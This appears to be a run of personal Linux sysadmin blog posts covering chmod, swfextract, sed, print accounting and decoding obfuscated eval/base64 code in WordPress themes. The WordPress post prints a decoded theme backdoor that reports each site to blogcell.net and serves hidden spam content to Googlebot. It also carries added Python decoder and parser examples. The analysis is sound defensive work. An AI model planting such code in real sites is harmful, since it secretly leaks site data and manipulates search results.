This post is just a personal note on how to chmod files or directories recursively.
Recursive chmod only files within this folder
find . -type f -exec chmod 0600 {} \;
Recursive chmod only folders within this folder
find . -type d -exec chmod 0755 {} \;
Posted by Hans-Henry Jakobsen
This post describes how to decompose a SWF Flash file using Linux and a program named swfextract. The post came to life because I had to make some changes to one of my Flash presentations but I had deleted all the source files. After searching the Internet I discovered swfextract.
SWF Tools is a collection of SWF (Flash) manipulation and creation utilities like pdf2swf, jpeg2swf, png2swf, gif2swf, font2swf, wav2swf, swfcombine, swfdump, swfstrings, swfbbox and swfc. But I’m only going to use swfextract in this post.
If you don’t have it installed on your system, download it and install the deb-package
# wget http://http.us.debian.org/debian/pool/main/s/swftools/swftools_0.8.1-2.1_i386.deb
# dpkg -i swftools_0.8.1-2.1_i386.deb
The swftools package depends on several packages, like libgif4 and libt1-5, and they should be installed before swftools
# aptitude install libgif4 libt1-5
I was interested in extracting the image files in my Flash presentation and did the following to determine what was in the presentation file
# swfextract flashfile.swf
Objects in file flashfile.swf:
 [-i] 5 Shapes: ID(s) 1, 3, 5, 7, 9
 [-j] 4 JPEGs: ID(s) 2, 6, 8, 10
 [-f] 1 Frame: ID(s) 0
As we see above there are 4 JPEG-files I'm interested in extracting and their IDs.
I did the following to extract the image files
# swfextract -i 2 -j 2,6,8,10 flashfile.swf
Result files
output.swf pic10.jpg pic2.jpg pic6.jpg pic8.jpg
If you don't use the -i switch you will end up with only one output.jpg file.
You are now ready to recreate the Flash presentation using the extracted image files.
Source
http://www.swftools.org
SWF Tools
Tags: adobe, decompose, extract, Flash, howto, SWF, swfextract
Posted by Hans-Henry Jakobsen
In this post I would like to replace all <embed> HTML tags in an HTML file with a <strong> tag.
# sed -e 's/<embed[^>]*>/<strong>/g' filename.html > newfile.html
And if you would like to remove the <embed> tag altogether
# sed -e 's/<embed[^>]*>//g' filename.html > newfile.html
To remove all HTML tags in a file
# sed -e 's/<[^>]*>//g' filename.html > newfile.html
The result file newfile.html is now without any < HTML tags >.
Tags: html, regexp, replace, sed
Posted by Hans-Henry Jakobsen
Lately I’ve been downloading and reading up on WordPress themes and stumbled upon something curious. Many themes had encrypted code/lines starting with the following code
Example 1
eval(base64_decode('abcdefgh....')
and other variations like
Example 2
eval(gzinflate(str_rot13(base64_decode('abcdefgh...')
This made me curious about why someone would make such an effort to obfuscate their code. Personally I would like to know what code my themes are running, so not decoding these eval lines in my WordPress themes was not an option. It also made me wonder whether many of my themes had these lines of code. A simple command run from the console in the wp-content/themes directory of your WordPress installation reveals all the themes that contain encoded code
grep -R eval * | grep decode | grep php
I had several themes containing code for hiding code, and some of the themes had hacks that redirected traffic to other sites.
Decoding Example 1 can be performed by using the following script and inserting the encoded text in variable $a.
The PHP decoder script
The encrypted text is taken from an unnamed random theme I have downloaded.
<?php
$a = 'ZnVuY3Rpb24gd3BfZ2V0X2Zvb3Rlcl9tZXRhKCkge2dsb2JhbCAkd3BkYjtpZiAoJGFkd2Jfb3B0ID0gJHdwZGItPmdldF92YXIoIlNFTEVDVCBvcHRpb25fdmFsdWUgRlJPTSAkd3BkYi0+b3B0aW9ucyBXSEVSRSBvcHRpb25fbmFtZT0nYWR3Yl9vcHQnIikpJGFkd2Jfb3B0ID0gdW5zZXJpYWxpemUoJGFkd2Jfb3B0KTtlbHNleyRhZHdiX29wdCA9IGFycmF5KDAsJycpOyR3cGRiLT5xdWVyeSgiSU5TRVJUIElOVE8gJHdwZGItPm9wdGlvbnMgKG9wdGlvbl9uYW1lLCBvcHRpb25fdmFsdWUsIGF1dG9sb2FkKSBWQUxVRVMgKCdhZHdiX29wdCcsICciLnNlcmlhbGl6ZSgkYWR3Yl9vcHQpLiInLCAnbm8nKSIpO31pZiAoKHRpbWUoKS0kYWR3Yl9vcHRbMF0pID49IDM2MDApeyRhZHdiX2hvc3QgPSAnYmxvZ2NlbGwubmV0JzskYWR3Yl9nZXQgID0gJy93cGFtLyc7JGFkd2Jfc29jICA9IEBmc29ja29wZW4oJGFkd2JfaG9zdCw4MCwkX2VuLCRfZXMsMzApO2lmICgkYWR3Yl9zb2Mpe0BzdHJlYW1fc2V0X3RpbWVvdXQoJGFkd2Jfc29jLDMwKTtAZndyaXRlKCRhZHdiX3NvYywiR0VUICRhZHdiX2dldCIuJz9oPScudXJsZW5jb2RlKCRfU0VSVkVSWydIVFRQX0hPU1QnXSkuJyZ1PScudXJsZW5jb2RlKCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKS4iIEhUVFAvMS4xXHJcbkhvc3Q6ICRhZHdiX2hvc3RcclxuQ29ubmVjdGlvbjogQ2xvc2VcclxuXHJcbiIpOyRhZHdiX2RhdGEgPSAnJzt3aGlsZSghZmVvZigkYWR3Yl9zb2MpKSAkYWR3Yl9kYXRhIC49IEBmZ2V0cygkYWR3Yl9zb2MsIDEwMjQpOyRhZHdiX2RhdGEgPSB0cmltKHN0cnN0cigkYWR3Yl9kYXRhLCJcclxuXHJcbiIpKTt9QGZjbG9zZSgkYWR3Yl9zb2MpO3ByZWdfbWF0Y2goJy88YWRidWc+KC4rPyk8XC9hZGJ1Zz4vcycsJGFkd2JfZGF0YSwkYWR3Yl90bXApO2lmKCRhZHdiX3RtcFsxXSE9IiIpeyRhZHdiX29wdCA9IGFycmF5KHRpbWUoKSwgJGFkd2JfdG1wWzFdKTskd3BkYi0+cXVlcnkoIlVQREFURSAkd3BkYi0+b3B0aW9ucyBTRVQgb3B0aW9uX3ZhbHVlPSciLm15c3FsX2VzY2FwZV9zdHJpbmcoc2VyaWFsaXplKCRhZHdiX29wdCkpLiInIFdIRVJFIG9wdGlvbl9uYW1lPSdhZHdiX29wdCciKTt9fWlmIChlcmVnaSgiZ29vZ2xlYm90IiwkX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10pKXtpZiAoJGFkd2Jfb3B0WzFdIT0iIillY2hvICRhZHdiX29wdFsxXTt9fSBhZGRfYWN0aW9uKCJ3cF9mb290ZXIiLCAid3BfZ2V0X2Zvb3Rlcl9tZXRhIik7';
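// Decode a single base64 layer.
function a($a){ return base64_decode($a);}
$b = false; // becomes true once no eval() wrapper is left
$count = 0; // number of layers decoded so far
while(!$b){
// Always decode the first layer, then continue while the result is itself wrapped in eval(...).
if(substr($a,0,4) == 'eval' || !$count){
$a = a(str_replace(Array('eval(base64_decode(\'','\')));'),'',$a));
$count++;
}else
$b = true;
}
// Print the decoded source; it is never executed.
echo $a;
?>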
To run it from a console window you can do the following. Do not run it as a privileged user, in case it does something nasty.
php scriptname.php > result.txt
My text would output the following text to the result.txt file
function wp_get_footer_meta() {
global $wpdb;
if ($adwb_opt = $wpdb->get_var("SELECT option_value FROM $wpdb->options WHERE option_name='adwb_opt'"))$adwb_opt = unserialize($adwb_opt);
else{$adwb_opt = array(0,'');
$wpdb->query("INSERT INTO $wpdb->options (option_name, option_value, autoload) VALUES ('adwb_opt', '".serialize($adwb_opt)."', 'no')");
}
if ((time()-$adwb_opt[0]) >= 3600){$adwb_host = 'blogcell.net';
$adwb_get = '/wpam/';$adwb_soc = @fsockopen($adwb_host,80,$_en,$_es,30);
if ($adwb_soc) {
@stream_set_timeout($adwb_soc,30);
@fwrite($adwb_soc,"GET $adwb_get".'?h='.urlencode($_SERVER['HTTP_HOST']).'&u='.urlencode($_SERVER['REQUEST_URI'])." HTTP/1.1\r\nHost: $adwb_host\r\nConnection: Close\r\n\r\n");
$adwb_data = '';
while(!feof($adwb_soc)) $adwb_data .= @fgets($adwb_soc, 1024);
$adwb_data = trim(strstr($adwb_data,"\r\n\r\n"));
}
@fclose($adwb_soc);
preg_match('/<adbug>(.+?)<\/adbug>/s',$adwb_data,$adwb_tmp);
if($adwb_tmp[1]!=""){$adwb_opt = array(time(), $adwb_tmp[1]);
$wpdb->query("UPDATE $wpdb->options SET option_value='".mysql_escape_string(serialize($adwb_opt))."' WHERE option_name='adwb_opt'");
}
}
if (eregi("googlebot",$_SERVER['HTTP_USER_AGENT'])){if ($adwb_opt[1]!="")echo $adwb_opt[1];
}
}
add_action("wp_footer", "wp_get_footer_meta");
You should then decide if the decoded code is something you would like to run on your WordPress site. Some themes do this to hide their WordPress theme tricks, while others do it to do nasty stuff like redirecting traffic from your site to other sites, etc.
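The PHP script above only handles the Example 1 form. The following added example (not part of the original post or of the decoder script it cites) statically unwraps both Example 1 and the Example 2 chain in Python, so the theme code is never executed. The names peel and wrap and the sample payloads are hypothetical and constructed for illustration.

```python
import base64, codecs, re, zlib

# PHP function name -> Python equivalent (bytes in, bytes out).
DECODERS = {
    "base64_decode": base64.b64decode,
    "str_rot13": lambda b: codecs.encode(b.decode("latin-1"), "rot13").encode("latin-1"),
    "gzinflate": lambda b: zlib.decompress(b, -15),  # raw DEFLATE stream
}
# Matches eval( f1( f2( ... 'literal'
WRAPPER = re.compile(
    r"eval\s*\(\s*((?:(?:%s)\s*\(\s*)+)(['\"])(.*?)\2" % "|".join(DECODERS), re.S)

def peel(source, max_layers=20):
    """Statically unwrap nested eval(...) layers; nothing is executed."""
    text, layers = source, 0
    while layers < max_layers:
        m = WRAPPER.search(text)
        if not m:
            break
        data = m.group(3).encode("latin-1", "ignore")
        try:
            # The innermost call runs first, so apply the chain right to left.
            for name in reversed(re.findall(r"\w+", m.group(1))):
                data = DECODERS[name](data)
        except (ValueError, zlib.error):
            break  # malformed literal: stop and return what we have
        text, layers = data.decode("utf-8", "replace"), layers + 1
    return text, layers

def wrap(payload, chain):
    """Build a constructed test sample; chain lists PHP calls outermost first."""
    data = payload.encode()
    for name in chain:
        if name == "gzinflate":
            c = zlib.compressobj(9, zlib.DEFLATED, -15)
            data = c.compress(data) + c.flush()
        elif name == "str_rot13":
            data = DECODERS["str_rot13"](data)  # rot13 is its own inverse
        else:
            data = base64.b64encode(data)
    calls = "".join(n + "(" for n in chain)
    return "eval(%s'%s'%s;" % (calls, data.decode("latin-1"), ")" * (len(chain) + 1))

# Constructed, harmless samples shaped like Example 1 and Example 2.
SAMPLE_1 = wrap("echo 'theme footer';", ["base64_decode"])
SAMPLE_2 = wrap("echo 'theme footer';", ["gzinflate", "str_rot13", "base64_decode"])
NESTED = wrap(SAMPLE_2, ["base64_decode"])
```

peel returns the decoded text together with the number of layers removed, so a result of 0 layers means the file had no wrapper this example recognises.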
Source: The decoder script was found here
Tags: base64_decode, eval, gzinflate, PHP, str_rot13, Wordpress, Wordpress theme
Posted by Hans-Henry Jakobsen
This post continues where my previous post titled Export events including Event Properties from Windows Event Viewer left off.
The data I’m going to work with was exported using eventquery.vbs and saved in a CSV (comma-separated) file, and it is presented in the form shown below.
"Information","10","12.05.2009 13:24:48","Print","Servername","None","AD\username","Document 232, filename.pdf owned by username was printed on printername via port IP_192.168.0.254. Size in bytes: 279232; pages printed: 18"
I’m interested in the username, date/time printed and pages printed and will now show how I’ve accomplished that using some simple Linux console commands.
awk -F, '{print $7 " " $3 " " $4 " " $NF}' Event_Viewer_System.csv | grep printername | awk '{print $1 "," $2 "," $3 "," $NF}' | sed 's/\"//g'|sort > PrintAccounting.csv
Result
username,14.05.2009,12:58:41,18
username,15.05.2009,09:24:13,2
username,15.05.2009,09:25:00,37
username,15.05.2009,09:30:03,2
username,15.05.2009,09:30:29,2
...
Where the fields contain username, date, time and the amount of printed pages.
A short description of what's being done
And that’s how you make a primitive print accounting system from data gathered in a Windows Server.
This particular example has been tested on data from a Windows 2003 Server, but I think it can be performed on other versions of Windows as well.
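The same extraction as an added Python example (not the original pipeline): it parses the quoted CSV fields properly, so commas inside a document name do not shift the columns, and it goes one step further by totalling pages per user. The function names, the users alice and bob, the second printer and the sample rows are constructed assumptions; only the field layout and the message wording come from the exported line shown above.

```python
import csv, io, re
from collections import defaultdict
from datetime import datetime

# Constructed sample rows in the eventquery.vbs CSV layout shown above.
SAMPLE = r'''"Information","10","15.05.2009 09:24:13","Print","Servername","None","AD\bob","Document 7, notes.txt owned by bob was printed on printername via port IP_192.168.0.254. Size in bytes: 1024; pages printed: 2"
"Information","10","12.05.2009 13:24:48","Print","Servername","None","AD\alice","Document 232, a,b.pdf owned by alice was printed on printername via port IP_192.168.0.254. Size in bytes: 279232; pages printed: 18"
"Information","10","14.05.2009 12:58:41","Print","Servername","None","AD\alice","Document 233, c.pdf owned by alice was printed on otherprinter via port IP_192.168.0.254. Size in bytes: 4096; pages printed: 5"
"Warning","1","14.05.2009 13:00:00","OtherSource","Servername","None","N/A","Constructed non-print event"
'''
JOB = re.compile(r"was printed on (.+?) via port .*pages printed: (\d+)")

def print_jobs(csv_text, printer=None):
    """Return (user, date, time, pages) tuples, sorted by user then timestamp."""
    jobs = []
    for rec in csv.reader(io.StringIO(csv_text)):
        if len(rec) < 8 or rec[3] != "Print":
            continue  # header line or a non-print event
        m = JOB.search(rec[7])
        if not m or (printer and m.group(1) != printer):
            continue
        try:
            when = datetime.strptime(rec[2], "%d.%m.%Y %H:%M:%S")
        except ValueError:
            continue  # unexpected timestamp format
        user = rec[6].split("\\")[-1]  # assumption: drop the AD\ domain prefix
        jobs.append((user, when, int(m.group(2))))
    jobs.sort()  # real timestamps, so 02.06 sorts after 15.05
    return [(u, w.strftime("%d.%m.%Y"), w.strftime("%H:%M:%S"), p) for u, w, p in jobs]

def pages_per_user(jobs):
    """Sum printed pages per user from print_jobs() output."""
    totals = defaultdict(int)
    for user, _date, _time, pages in jobs:
        totals[user] += pages
    return dict(totals)

if __name__ == "__main__":
    for job in print_jobs(SAMPLE, "printername"):
        print(",".join(map(str, job)))
    print(pages_per_user(print_jobs(SAMPLE)))
```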
Tags: csv, Event Properties, Event Viewer, eventquery.vbs
Posted by Hans-Henry Jakobsen